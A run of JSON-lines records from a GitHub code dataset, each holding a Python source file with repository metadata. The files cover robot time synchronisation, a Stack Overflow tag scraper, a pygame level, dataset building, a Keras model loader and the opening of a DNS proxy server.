away_wins_oponnent_pts[\"Points\"]}\n\n\tdef oponnet_tied_points(self, match_points):\n\t\thome_wins_oponnent_pts = match_points[match_points['TeamHG'] == match_points['AigAG']]\n\t\taway_wins_oponnent_pts = match_points[match_points['TeamAG'] == match_points['AigHG']]\n\n\t\treturn {\"home\": home_wins_oponnent_pts[\"Points\"], \"away\": away_wins_oponnent_pts[\"Points\"]}\n\n\tdef oponnet_wins_points(self, match_points):\n\t\thome_wins_oponnent_pts = match_points[match_points['TeamHG'] < match_points['AigAG']]\n\t\taway_wins_oponnent_pts = match_points[match_points['TeamAG'] < match_points['AigHG']]\n\n\t\treturn {\"home\": home_wins_oponnent_pts[\"Points\"], \"away\": away_wins_oponnent_pts[\"Points\"]}\n\t\t\n\n\n\t\t \n","repo_name":"talestsp/league_analytics","sub_path":"league_analysis.py","file_name":"league_analysis.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13035580123","text":"import time\nfrom threading import Event, Lock, Thread\n\nfrom google.protobuf import duration_pb2\n\nfrom bosdyn.api import time_sync_pb2, time_sync_service_pb2_grpc\nfrom bosdyn.api.time_range_pb2 import TimeRange\nfrom bosdyn.util import (RobotTimeConverter, now_nsec, nsec_to_timestamp, parse_timespan,\n set_timestamp_from_nsec, timestamp_to_nsec)\n\nfrom .common import BaseClient, common_header_errors\nfrom .exceptions import Error\n\n\nclass TimeSyncError(Error):\n \"\"\"General class of errors for TimeSync non-response / non-grpc errors.\"\"\"\n\n\nclass NotEstablishedError(TimeSyncError):\n \"\"\"Client has not established time-sync with the robot.\"\"\"\n\n\nclass TimedOutError(TimeSyncError):\n \"\"\"Exceeded deadline to achieve time-sync.\"\"\"\n\n\nclass InactiveThreadError(TimeSyncError):\n \"\"\"Time-sync thread is no longer running.\"\"\"\n\n\nclass TimeSyncClient(BaseClient):\n \"\"\"A client for establishing time-sync with a server/robot.\"\"\"\n default_service_name = 'time-sync'\n service_type = 'bosdyn.api.TimeSyncService'\n\n def __init__(self):\n super(TimeSyncClient, self).__init__(time_sync_service_pb2_grpc.TimeSyncServiceStub)\n\n def get_time_sync_update(self, previous_round_trip, clock_identifier, **kwargs):\n \"\"\"Obtain an initial or updated timesync estimate with server.\n\n Args:\n previous_round_trip (bosdyn.api.TimeSyncRoundTrip): None on first rpc call, then\n fill out with previous response\n from server.\n clock_identifier (string): Empty on first call, assigned by server in first response.\n\n Raises:\n RpcError: Problem communicating with the robot.\n \"\"\"\n req = self._get_time_sync_update_request(previous_round_trip, clock_identifier)\n return self.call(self._stub.TimeSyncUpdate, req, None, common_header_errors,\n copy_request=False, **kwargs)\n\n def get_time_sync_update_async(self, previous_round_trip, clock_identifier, **kwargs):\n \"\"\"Async version of get_time_sync_update()\"\"\"\n req = self._get_time_sync_update_request(previous_round_trip, clock_identifier)\n return self.call_async(self._stub.TimeSyncUpdate, req, None, common_header_errors,\n copy_request=False, **kwargs)\n\n\n @staticmethod\n def _get_time_sync_update_request(previous_round_trip, clock_identifier):\n return time_sync_pb2.TimeSyncUpdateRequest(previous_round_trip=previous_round_trip,\n clock_identifier=clock_identifier)\n\n\ndef _get_time_sync_status_value(response):\n return response.time_sync_status_map\n\n\ndef robot_time_range_from_nanoseconds(start_nsec, end_nsec, time_sync_endpoint=None):\n \"\"\"Generate timespan as a TimeRange proto, in robot time.\n\n If time_sync_endpoint is a TimeSyncEndpoint, the time_spec is in the local clock and will\n be converted to robot_time.\n If the input times are already in the robot clock, do not specify time_sync_endpoint and\n the times will not be converted.\n\n Args:\n start_nsec nanoseconds since the Unix epoch or None\n end_nsec nanoseconds since the Unix epoch or None\n time_sync_endpoint Either TimeSyncEndpoint or None.\n\n Returns:\n return bosdyn.api.TimeRange time range in robot time\n \"\"\"\n time_range = TimeRange()\n converter = time_sync_endpoint.get_robot_time_converter() if time_sync_endpoint else None\n\n def _convert_nsec(nsec):\n timestamp_proto = nsec_to_timestamp(int(nsec))\n if not time_sync_endpoint:\n return timestamp_proto\n return converter.robot_timestamp_from_local(timestamp_proto)\n\n # pylint: disable=no-member\n if start_nsec:\n time_range.start.CopyFrom(_convert_nsec(start_nsec))\n if end_nsec:\n time_range.end.CopyFrom(_convert_nsec(end_nsec))\n\n return time_range\n\n\ndef robot_time_range_from_datetimes(start_datetime, end_datetime, time_sync_endpoint=None):\n \"\"\"Generate timespan as a TimeRange proto, in robot time.\n\n If time_sync_endpoint is a TimeSyncEndpoint, the time_spec is in the local clock and will\n be converted to robot_time.\n If the input times are already in the robot clock, do not specify time_sync_endpoint and\n the times will not be converted.\n\n Args:\n start_datetime: timestamp.timestamp or None\n end_datetime: timestamp.timestamp or None\n time_sync_endpoint: Either TimeSyncEndpoint or None.\n\n Returns:\n return bosdyn.api.TimeRange time range in robot time\n \"\"\"\n\n def _datetime_to_nsec(date_time):\n if date_time:\n return date_time.timestamp() * 1e9\n return None\n\n return robot_time_range_from_nanoseconds(_datetime_to_nsec(start_datetime),\n _datetime_to_nsec(end_datetime), time_sync_endpoint)\n\n\ndef timespec_to_robot_timespan(timespan_spec, time_sync_endpoint=None):\n \"\"\"Generate timespan as TimeRange proto, in robot time.\n\n If time_sync_endpoint is a TimeSyncEndpoint, the time_spec is in the local clock and will\n be converted to robot_time.\n If the input times are already in the robot clock, do not specify time_sync_endpoint and\n the times will not be converted.\n\n Args:\n timespan_spec '{val}-{val}' or '{val}' time spec string\n time_sync_endpoint Either TimeSyncEndpoint or None.\n\n Returns:\n return bosdyn.api.TimeRange time range in robot time\n \"\"\"\n start_datetime, end_datetime = parse_timespan(timespan_spec)\n return robot_time_range_from_datetimes(start_datetime, end_datetime, time_sync_endpoint)\n\n\n\n\nclass TimeSyncEndpoint:\n \"\"\"A wrapper that uses a TimeSyncClient object to establish and maintain timesync with a robot.\n\n This class manages internal state, including a clock identifier and previous best time sync\n estimates. This class automatically builds requests passed to the TimeSyncClient, so users\n don't have to worry about the details of establishing and maintaining timesync.\n\n This object is thread-safe.\n \"\"\"\n\n def __init__(self, time_sync_client):\n self._client = time_sync_client\n self._lock = Lock()\n # Access these using the lock.\n # These should be updated by replacement, not mutation so that they may be used\n # outside the lock after being accessed via the lock.\n self._locked_previous_round_trip = None\n self._locked_previous_response = None\n self._locked_clock_identifier = \"\"\n\n @property\n def response(self):\n \"\"\"The last response message from the time-sync service.\n\n Returns:\n The bosdyn.api.TimeSyncResponse proto last returned by the server, or None if unset.\n \"\"\"\n with self._lock:\n return self._locked_previous_response\n\n @property\n def has_established_time_sync(self):\n \"\"\"Checks if the client has successfully established time-sync with the robot.\n\n Returns:\n Boolean true if the previous time-sync update returned that time sync is OK.\n \"\"\"\n response = self.response\n # pylint: disable=no-member\n return response and response.state.status == time_sync_pb2.TimeSyncState.STATUS_OK\n\n @property\n def round_trip_time(self):\n \"\"\"The previous round trip time.\n\n Returns:\n Round trip time as google.protobuf.Duration proto if available, otherwise None.\n \"\"\"\n response = self.response\n if response is None:\n return None\n return response.state.best_estimate.round_trip_time\n\n @property\n def clock_identifier(self):\n \"\"\"The clock identifier for the instance of the time-sync client.\n\n Returns:\n A unique identifier for this client. Empty if get_new_estimate has not been called.\n \"\"\"\n with self._lock:\n return self._locked_clock_identifier\n\n @property\n def clock_skew(self):\n \"\"\"The best current estimate of clock skew from the time-sync service.\n\n Returns:\n The google.protobuf.Duration representing the clock skew.\n\n Raises:\n NotEstablishedError: Time sync has not yet been established.\n \"\"\"\n response = self.response\n # pylint: disable=no-member\n if not response or response.state.status != time_sync_pb2.TimeSyncState.STATUS_OK:\n raise NotEstablishedError\n return response.state.best_estimate.clock_skew\n\n def establish_timesync(self, max_samples=25, break_on_success=False):\n \"\"\"Perform time-synchronization until time sync established.\n\n Args:\n max_samples (int): The maximum number of times to attempt to establish time-sync\n through time-synchronization.\n break_on_success (bool): If true, stop performing the time-synchronization after\n time-sync is established.\n\n Return:\n Boolean true if valid timesync has been established.\n \"\"\"\n counter = 0\n while counter < max_samples:\n if break_on_success and self.has_established_time_sync:\n return True\n self.get_new_estimate()\n counter += 1\n return self.has_established_time_sync\n\n def _get_update(self):\n round_trip = None\n clock_identifier = None\n with self._lock:\n # Only add a round trip to the request along with a clock identifier, otherwise\n # the sever will respond with an invalid request error.\n # Responses with errors may not contain a clock identifier.\n # This may happen, for example, if the service was not yet ready at the time of\n # the request.\n if self._locked_clock_identifier:\n round_trip = self._locked_previous_round_trip\n clock_identifier = self._locked_clock_identifier\n return self._client.get_time_sync_update(previous_round_trip=round_trip,\n clock_identifier=clock_identifier)\n\n def get_new_estimate(self):\n \"\"\"Perform an update-cycle toward achieving time-synchronization.\n\n Return:\n Boolean true if valid timesync has been established.\n \"\"\"\n response = self._get_update()\n rx_time = now_nsec()\n\n # Record the timing information for this GRPC call to pass to the next update\n round_trip = time_sync_pb2.TimeSyncRoundTrip()\n # pylint: disable=no-member\n round_trip.client_tx.CopyFrom(response.header.request_header.request_timestamp)\n round_trip.server_rx.CopyFrom(response.header.request_received_timestamp)\n round_trip.server_tx.CopyFrom(response.header.response_timestamp)\n set_timestamp_from_nsec(round_trip.client_rx, rx_time)\n\n with self._lock:\n self._locked_previous_round_trip = round_trip\n # Store the response to get clock-skew estimate, etc.\n self._locked_previous_response = response\n self._locked_clock_identifier = response.clock_identifier\n\n return self.has_established_time_sync\n\n def get_robot_time_converter(self):\n \"\"\"Get a RobotTimeConverter for current estimate for robot clock skew from local time.\n\n Returns:\n An instance of RobotTimeConvertor for the time-sync client.\n\n Raises:\n NotEstablishedError: If time sync has not yet been established.\n \"\"\"\n return RobotTimeConverter(timestamp_to_nsec(self.clock_skew))\n\n def robot_timestamp_from_local_secs(self, local_time_secs):\n \"\"\"Convert a local time in seconds to a timestamp proto in robot time.\n\n Args:\n local_time_secs (float): Timestamp in seconds since the unix epoch (e.g.,\n from time.time()).\n\n Returns:\n google.protobuf.Timestamp representing local_time_secs in robot clock, or None if\n local_time_secs is None.\n\n Raises:\n NotEstablishedError: Time sync has not yet been established.\n \"\"\"\n if not local_time_secs:\n return None\n converter = self.get_robot_time_converter()\n return converter.robot_timestamp_from_local_secs(local_time_secs)\n\n\nclass TimeSyncThread:\n \"\"\"Background thread for achieving and maintaining time-sync to the robot.\"\"\"\n\n # After achieving time sync, update estimate every minute.\n DEFAULT_TIME_SYNC_INTERVAL_SEC = 60\n\n # When time-sync service is not yet ready, poll it at this interval\n TIME_SYNC_SERVICE_NOT_READY_INTERVAL_SEC = 5\n\n def __init__(self, time_sync_client):\n self._time_sync_endpoint = TimeSyncEndpoint(time_sync_client)\n self._lock = Lock()\n self._locked_time_sync_interval_sec = self.DEFAULT_TIME_SYNC_INTERVAL_SEC\n self._locked_should_exit = False # Used to tell the thread to stop running.\n self._locked_thread_exception = None # Stores any exception which ends the thread.\n self._event = Event() # Used to wait for next time sync, or until thread should exit.\n self._thread = None\n\n def __del__(self):\n # Stop the thread when this object is deleted.\n self.stop()\n\n def start(self):\n \"\"\"Start the thread.\"\"\"\n with self._lock:\n if self._thread and self._thread.is_alive():\n return\n self._locked_should_exit = False\n self._locked_thread_exception = None\n self._event.clear()\n self._thread = Thread(target=self._timesync_thread)\n self._thread.daemon = True\n self._thread.start()\n\n def stop(self):\n \"\"\"Shut down the thread if it is running.\"\"\"\n if self._thread:\n with self._lock:\n self._locked_should_exit = True # Signal the thread to exit.\n self._event.set() # Stop the thread's wait for the next time-sync update.\n self._thread.join() # Join the thread after it exits.\n self._thread = None\n\n @property\n def time_sync_interval_sec(self):\n \"\"\"Returns interval at which time-sync is updated in the thread.\"\"\"\n with self._lock:\n return self._locked_time_sync_interval_sec\n\n @time_sync_interval_sec.setter\n def time_sync_interval_sec(self, val):\n \"\"\"Set interval at which time-sync is updated in the thread after sync is established.\n\n Args:\n val (float): The interval (in seconds) that the time-sync estimate should be updated.\n \"\"\"\n with self._lock:\n self._locked_time_sync_interval_sec = val\n self._event.set()\n\n @property\n def should_exit(self):\n \"\"\"Returns True if thread should stop iterating.\"\"\"\n with self._lock:\n return self._locked_should_exit\n\n def wait_for_sync(self, timeout_sec=3.0):\n \"\"\"Wait for up to the given timeout for time-sync to be achieved\n\n Args:\n timeout_sec (float): Maximum time (seconds) to wait for time-sync to be achieved.\n\n Raises:\n InactiveThreadError: Thread is not running.\n time_sync.TimedOutError: Deadline to achieve time-sync is exceeded.\n Threading Exceptions: Errors from threading the processes.\n \"\"\"\n if self.has_established_time_sync:\n return\n end_time_sec = time.time() + timeout_sec\n while not self.stopped:\n if self.endpoint.has_established_time_sync:\n return\n if time.time() > end_time_sec:\n raise TimedOutError\n time.sleep(0.1)\n thread_exc = self.thread_exception\n if thread_exc:\n raise thread_exc\n raise InactiveThreadError\n\n @property\n def has_established_time_sync(self):\n \"\"\"Checks if the client has successfully established time-sync with the robot.\n\n Returns:\n Boolean true if the previous time-sync update returned that time sync is OK.\n \"\"\"\n return self.endpoint.has_established_time_sync\n\n @property\n def stopped(self):\n \"\"\"Returns True if thread is no longer running.\"\"\"\n with self._lock:\n return not self._thread or not self._thread.is_alive()\n\n @property\n def thread_exception(self):\n \"\"\"Return any exception which ended the time-sync thread.\"\"\"\n with self._lock:\n return self._locked_thread_exception\n\n @property\n def endpoint(self):\n \"\"\"Return the TimeSyncEndpoint used by this thread.\"\"\"\n return self._time_sync_endpoint\n\n def get_robot_clock_skew(self, timesync_timeout_sec=0):\n \"\"\"Get current estimate for robot clock skew from local time.\n\n Args:\n timesync_timeout_sec (float): Time to wait for timesync before doing conversion.\n\n Returns:\n Clock skew as a google.protobuf.Duration object\n\n Raises:\n InactiveThreadError: Time-sync thread exits before time-sync.\n time_sync.TimedOutError: Deadline to achieve time-sync is exceeded.\n Threading Exceptions: Errors from threading the processes.\n \"\"\"\n self.wait_for_sync(timeout_sec=timesync_timeout_sec)\n return self.endpoint.clock_skew\n\n def get_robot_time_converter(self, timesync_timeout_sec=0):\n \"\"\"Get a RobotTimeConverter for current estimate for robot clock skew from local time.\n\n Args:\n timesync_timeout_sec (float): Time to wait for timesync before doing conversion.\n\n Raises:\n InactiveThreadError: Time-sync thread exits before time-sync.\n time_sync.TimedOutError: Deadline to achieve time-sync is exceeded.\n Threading Exceptions: Errors from threading the processes.\n \"\"\"\n self.wait_for_sync(timeout_sec=timesync_timeout_sec)\n return self.endpoint.get_robot_time_converter()\n\n def robot_timestamp_from_local_secs(self, local_time_secs, timesync_timeout_sec=0):\n \"\"\"Convert a local time in seconds to a timestamp proto in robot time.\n\n Args:\n local_time_secs (float): Timestamp in seconds since the unix epoch (e.g.,\n from time.time()).\n timesync_timeout_sec (float): Time to wait for timesync before doing conversion.\n\n Returns:\n google.protobuf.Timestamp representing local_time_secs in robot clock, or None if\n local_time_secs is None.\n\n Raises:\n InactiveThreadError: Time-sync thread exits before time-sync.\n time_sync.TimedOutError: Deadline to achieve time-sync is exceeded.\n Threading Exceptions: Errors from threading the processes.\n \"\"\"\n if not local_time_secs:\n return None\n converter = self.get_robot_time_converter(timesync_timeout_sec)\n return converter.robot_timestamp_from_local_secs(local_time_secs)\n\n def _timesync_thread(self):\n \"\"\"Background thread which communicates with the time-sync service on robot.\n\n The purpose of this thread is to achieve and maintain time-sync, which is an estimate\n of the difference between the robot's and client's system clocks.\n \"\"\"\n try:\n while not self.should_exit:\n response = self._time_sync_endpoint.response\n # pylint: disable=no-member\n if (not response or response.state.status\n == time_sync_pb2.TimeSyncState.STATUS_MORE_SAMPLES_NEEDED):\n # No wait between updates while time-sync is not established.\n pass\n elif response.state.status == time_sync_pb2.TimeSyncState.STATUS_SERVICE_NOT_READY:\n # Wait a few seconds between updates while waiting for time-sync service\n # to be ready.\n self._event.wait(self.TIME_SYNC_SERVICE_NOT_READY_INTERVAL_SEC)\n else:\n # When sync has been established, use default wait time.\n self._event.wait(self.time_sync_interval_sec)\n\n # Do RPC call to update time-sync information.\n if not self.should_exit:\n self._time_sync_endpoint.get_new_estimate()\n\n # For now, on GRPC error, store the error object and exit the thread.\n except Error as err:\n with self._lock:\n self._locked_thread_exception = err\n","repo_name":"boston-dynamics/spot-sdk","sub_path":"python/bosdyn-client/src/bosdyn/client/time_sync.py","file_name":"time_sync.py","file_ext":"py","file_size_in_byte":20605,"program_lang":"python","lang":"en","doc_type":"code","stars":2148,"dataset":"github-code","pt":"61"} +{"seq_id":"5416808924","text":"# sentence = \"What is the Airspeed Velocity of an Unladen Swallow?\"\n# result = {word: len(word) for word in sentence.split()}\n# print(result)\n\n\n# You are going to use Dictionary Comprehension to create a dictionary called weather_f\n# that takes each temperature in degrees Celsius and converts it into degrees Fahrenheit.\nweather_c = {\n \"Monday\": 12,\n \"Tuesday\": 14,\n \"Wednesday\": 15,\n \"Thursday\": 14,\n \"Friday\": 21,\n \"Saturday\": 22,\n \"Sunday\": 24,\n}\n\nweather_f = {day : temp*9/5+32 for (day, temp) in weather_c.items()}\n# print(weather_f)\nprint(weather_c.items())","repo_name":"Toffiona/100_days_of_code","sub_path":"Day_26/exercise_dict_comprehensive.py","file_name":"exercise_dict_comprehensive.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33336636221","text":"\"\"\"\nspider tags \nurl = \"https://stackoverflow.com/tags?page=\" + ### + \"&tab=popular\"\n\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\nimport sys\nimport argparse\n\ndef tags_spider(start_index, end_index):\n \"\"\"\n spider tags from pages[start_index, end_index]\n \"\"\"\n print(\"-----------spider tag process----------\")\n cnt = 0\n\n with open(\"../txts/tags.txt\", \"w\") as wf:\n \n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}\n for num in tqdm(range(start_index, end_index+1)):\n\n url = \"https://stackoverflow.com/tags?page=\" + str(num) + \"&tab=popular\"\n req = requests.get(url, headers=headers)\n soup = BeautifulSoup(req.text, \"lxml\")\n\n try:\n items = soup.find_all(\"a\", attrs={\"class\":\"post-tag\"})\n cnt += len(items)\n for item in items:\n # print(tag)\n tag = item.get_text()\n wf.write(tag+\"\\n\")\n except:\n continue\n \n print(\"spider\",cnt,\"tags.\")\n\n\n# start_index = int(sys.argv[1])\n# end_index = int(sys.argv[2])\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--start\", type=int, default=1, help=\"start index of page\")\n parser.add_argument(\"-e\", \"--end\", type=int, default=5, help=\"end index of page\")\n args = parser.parse_args()\n tags_spider(args.start, args.end)","repo_name":"Rvlis/Implementation-of-HDSKG-using-BERT","sub_path":"HDSKG-Chunking/tags_spider.py","file_name":"tags_spider.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"42115499696","text":"import pygame\n\nfrom classes.ysortcameragruop import YSortCameraGroup\nfrom utils import config, import_folder\nfrom classes.tile import Tile\nfrom classes.player import Player\nfrom classes.enemy import Enemy\nfrom classes.ui import UI\nfrom classes.weapon import Weapon\nfrom particles import ParticlesData\n\n\nclass Level:\n def __init__(self):\n self.screen = pygame.display.get_surface()\n self.visible_sprites = YSortCameraGroup()\n self.collided_sprites = pygame.sprite.Group()\n self.attack_sprites = pygame.sprite.Group()\n self.attackable_sprites = pygame.sprite.Group()\n\n self.game_over = False\n self.font = pygame.font.Font(config.UI_FONT, 48)\n self.game_over_text = self.font.render('Game Over', True, config.RED)\n self.text_rect = self.game_over_text.get_rect()\n self.text_rect.center = (config.WIDTH // 2, config.HEIGHT // 2)\n\n self.current_attack = None\n self.ui = UI()\n self.particle_animation = ParticlesData()\n self.create_map()\n\n def create_map(self):\n layouts = {\n 'boundary': import_folder.import_csv('sprites/map/map_FloorBlocks.csv'),\n 'entities': import_folder.import_csv('sprites/map/map_Entities.csv')\n }\n for style, layout in layouts.items():\n for i, row in enumerate(layout):\n for j, column in enumerate(row):\n if column != '-1':\n pos_x = j * config.TILE_SIZE\n pos_y = i * config.TILE_SIZE\n\n if style == 'boundary':\n Tile((pos_x, pos_y), [self.collided_sprites], 'invisible')\n if style == 'entities':\n if column == '394':\n self.player = Player((pos_x, pos_y), [self.visible_sprites],\n self.collided_sprites, self.create_attack, self.destroy_attack)\n else:\n if column == '392':\n monster_name = 'raccoon'\n else:\n monster_name = 'squid'\n Enemy(monster_name, (pos_x, pos_y), [self.visible_sprites, self.attackable_sprites],\n self.collided_sprites, self.attacking_player)\n\n def create_attack(self):\n self.current_attack = Weapon(self.player, [self.visible_sprites, self.attack_sprites])\n\n def destroy_attack(self):\n if self.current_attack:\n self.current_attack.kill()\n self.current_attack = None\n\n def player_attack_logic(self):\n if self.attack_sprites:\n for attack_sprite in self.attack_sprites:\n collision_sprite = pygame.sprite.spritecollide(attack_sprite, self.attackable_sprites, False)\n if collision_sprite:\n for target_sprite in collision_sprite:\n target_sprite.get_damage(self.player)\n\n def attacking_player(self, amount, attack_type):\n if self.player.vulnerable:\n if self.player.health <= 0:\n self.game_over = True\n self.game_end()\n else:\n self.player.health -= amount\n if self.player.health <= 0:\n self.game_over = True\n self.game_end()\n self.player.vulnerable = False\n self.player.hurt_time = pygame.time.get_ticks()\n self.particle_animation.create_particles(attack_type, self.player.rect.center, [self.visible_sprites])\n\n def update(self):\n self.visible_sprites.custom_draw(self.player)\n self.visible_sprites.update()\n self.visible_sprites.enemy_update(self.player)\n self.player_attack_logic()\n self.ui.display(self.player)\n self.game_end()\n\n def game_end(self):\n if self.game_over:\n self.player.kill()\n self.screen.fill(config.BLACK)\n self.screen.blit(self.game_over_text, self.text_rect)","repo_name":"LirioNOne/RPG_with_pygame","sub_path":"classes/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1557382471","text":"from PIL import Image\r\nimport os\r\nfrom numpy import genfromtxt\r\nimport gzip, pickle\r\nfrom glob import glob\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom tools import logger\r\nimport theano\r\nfrom context import resource_manager\r\nfrom tools import file_manage\r\n\r\nlog = logger.getLogger()\r\n\r\n\r\nclass pcolors:\r\n HEADER = '\\033[95m'\r\n OKBLUE = '\\033[94m'\r\n OKGREEN = '\\033[92m'\r\n WARNING = '\\033[93m'\r\n FAIL = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n Blue = '\\34[95m'\r\n\r\n def disable(self):\r\n self.HEADER = ''\r\n self.OKBLUE = ''\r\n self.OKGREEN = ''\r\n self.WARNING = ''\r\n self.FAIL = ''\r\n self.ENDC = ''\r\n\r\n\r\ndef dir_to_dataset(glob_files):\r\n dataset = []\r\n clazz = []\r\n for file_count, file_name in enumerate(sorted(glob(glob_files), key=len)):\r\n log.info(file_name + \"Working process:\\n\\t %s\" % glob_files)\r\n image = Image.open(file_name)\r\n img = Image.open(file_name).convert('LA') # tograyscale\r\n pixels = [f[0] for f in list(img.getdata())]\r\n dataset.append(pixels)\r\n classLabel = file_name.split(\"_\")[1];\r\n print\r\n file_name, \"<--->\", classLabel\r\n clazz.append(classLabel)\r\n if file_count % 1000 == 0:\r\n print(\"\\t %s files processed\" % file_count)\r\n # outfile = glob_files+\"out\"\r\n # np.save(outfile, dataset)\r\n\r\n return np.array(dataset), np.array(clazz)\r\n\r\n\r\ndef build_proxy(path):\r\n s = path.split(resource_manager.getSeparator())\r\n s = s[(len(s) - 1)]\r\n c = 0\r\n if s[0:4] == \"data\":\r\n log.info(\" do binaryzation about files in \" + str(path))\r\n size = s[4:]\r\n size = int(size)\r\n for i in os.walk(path, False):\r\n for f in i[2]:\r\n c = c + 1\r\n return c\r\n return 0\r\n\r\n\r\ndef initDataSet(src=resource_manager.Properties.getDefaultWorkFold()):\r\n log.info(\"starting to build image cnn pkz file.\")\r\n # print \"start binaryzationJpg()\"\r\n files = file_manage.subdirs(src)\r\n # files=file_manage.subfilesName(path);\r\n # print \"###########\",src,\"##\",length,\"###########\"\r\n sizeSet=set()\r\n for f in files:\r\n path = os.path.join(src, f)\r\n if os.path.isdir(path):\r\n # shutil.copy(os.path.join(path,f),os.path.join(path,f))\r\n\r\n s =path.split(resource_manager.getSeparator())\r\n s = s[(len(s) - 1)]\r\n c = 0\r\n size = 0\r\n if s[0:4] == \"data\":\r\n log.info(\" do binaryzation about files in \" + str(path))\r\n size = s[4:]\r\n size = str(size)\r\n sizeSet.add(size)\r\n else:\r\n continue\r\n for size in sizeSet:\r\n path = resource_manager.Properties.getDefaultWorkFold()+\"train/data\" + size + \"/*\";\r\n Data, y = dir_to_dataset(path)\r\n # Data and labels are read\r\n\r\n train_set_x = np.asarray(Data, dtype=theano.config.floatX);\r\n train_set_y = y;\r\n\r\n path = resource_manager.Properties.getDefaultWorkFold()+\"verify/data\" + size + \"/*\";\r\n Data, y = dir_to_dataset(path)\r\n\r\n val_set_x = np.asarray(Data, dtype=theano.config.floatX);\r\n val_set_y = y\r\n\r\n path = resource_manager.Properties.getDefaultWorkFold()+\"test/data\" + size + \"/*\";\r\n Data, y = dir_to_dataset(path)\r\n\r\n test_set_x = np.asarray(Data, dtype=theano.config.floatX);\r\n test_set_y = y\r\n\r\n train_set = train_set_x, train_set_y\r\n val_set = val_set_x, val_set_y\r\n test_set = test_set_x, test_set_y\r\n dataset = [train_set, val_set, test_set]\r\n log.info(\"staring build pkl file ......\")\r\n name = resource_manager.Properties.getDefaultDataFold()+'pickle/file-' + size + '.pkl.gz';\r\n f = gzip.open(name, 'wb')\r\n pickle.dump(dataset, f, protocol=2)\r\n f.close()\r\n log.info(\"the file of file-\"+size+\".pkl.gz file has been created at \" + resource_manager.Properties.getDefaultDataFold() + \"pickle\" + \"....\")\r\n\r\n\r\n# this is to test the data\r\ndef testData(index):\r\n f = gzip.open('file-28.pkl.gz', 'rb')\r\n train_set, valid_set, test_set = pickle.load(f)\r\n train_set_x = train_set[0];\r\n train_set_y = train_set[1];\r\n sample = np.asarray(train_set_x, dtype=theano.config.floatX)\r\n print\r\n len(sample[0])\r\n a = sample[index]\r\n j = 0;\r\n for i in range(0, len(a)):\r\n if a[i] > 128:\r\n print\r\n pcolors.FAIL + \"*\",\r\n else:\r\n print\r\n pcolors.HEADER + \"0\",\r\n if ((i + 1) % 28 == 0):\r\n print\r\n \"\"\r\n print\r\n \"label is:%s\" % train_set_y[index]\r\n\r\nif __name__==\"__main__\":\r\n initDataSet(src=resource_manager.Properties.getDefaultWorkFold())\r\n","repo_name":"gwdgithubnom/ox-patient","sub_path":"src/main/python/tools/dataset_build.py","file_name":"dataset_build.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17613817683","text":"__doc__=\"\"\"HardwareClass\n\nHardwareClass represents a software vendor's product.\n\n$Id: HardwareClass.py,v 1.5 2003/03/08 18:34:24 edahl Exp $\"\"\"\n\n__version__ = \"$Revision: 1.5 $\"[11:-2]\n\nfrom App.special_dtml import DTMLFile\nfrom AccessControl.class_init import InitializeClass\n\nfrom Products.ZenRelations.RelSchema import *\n\nfrom ProductClass import ProductClass\n\ndef manage_addHardwareClass(context, id, title = None, REQUEST = None):\n \"\"\"make a HardwareClass\"\"\"\n d = HardwareClass(id, title)\n context._setObject(id, d)\n\n if REQUEST is not None:\n REQUEST['RESPONSE'].redirect(context.absolute_url_path()\n +'/manage_main') \n\naddHardwareClass = DTMLFile('dtml/addHardwareClass',globals())\n\nclass HardwareClass(ProductClass):\n \"\"\"HardwareClass object\"\"\"\n portal_type = meta_type = 'HardwareClass'\n\nInitializeClass(HardwareClass)\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/HardwareClass.py","file_name":"HardwareClass.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"23888535897","text":"import numpy as np\nfrom keras.models import model_from_json\n\narquivo = open('classificador_breast.json','r')\nestrutura_rede = arquivo.read()\narquivo.close()\n\n#impota a estrutura da rede\nclassificador = model_from_json(estrutura_rede)\n#importa os pesos da rede\nclassificador.load_weights('classificador_braest.h5')\n\n#cria um novo registro para teste\nnovoRegisto=np.array([[15.80,8.34,118,900,0.10,0.26,0.08,0.134,0.178,0.20,0.05,1098,0.87,\n 4500,145.2,0.005,0.04,0.05,0.015,0.03,0.007,23.15,16.64,178.5,2018,0.14,\n 0.185,0.84,158,0.363]])\n#utiliza a rede para uma nova previsão\nprevisao = classificador.predict(novoRegisto)","repo_name":"Allanfd12/Curso-Deep-Learning","sub_path":"breast_cancer/breast_cancer_salvar_carregar/breast_cancer_carregar.py","file_name":"breast_cancer_carregar.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"17617252749","text":"#!/usr/bin/env python3\nimport logging\nimport os\nimport signal\nfrom pathlib import Path\nfrom time import sleep\n\nfrom dnslib import DNSLabel, QTYPE, RR, dns\nfrom dnslib.proxy import ProxyResolver\nfrom dnslib.server import DNSServer\n\n# Inicializa el logger\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.INFO)\nlogger = logging.getLogger(__name__)\nlogger.addHandler(handler)\nlogger.setLevel(logging.INFO)\n\n# Convierte strings a tipos de dnslib\nDNS_TYPES = {\n 'A': (dns.A, QTYPE.A),\n 'AAAA': 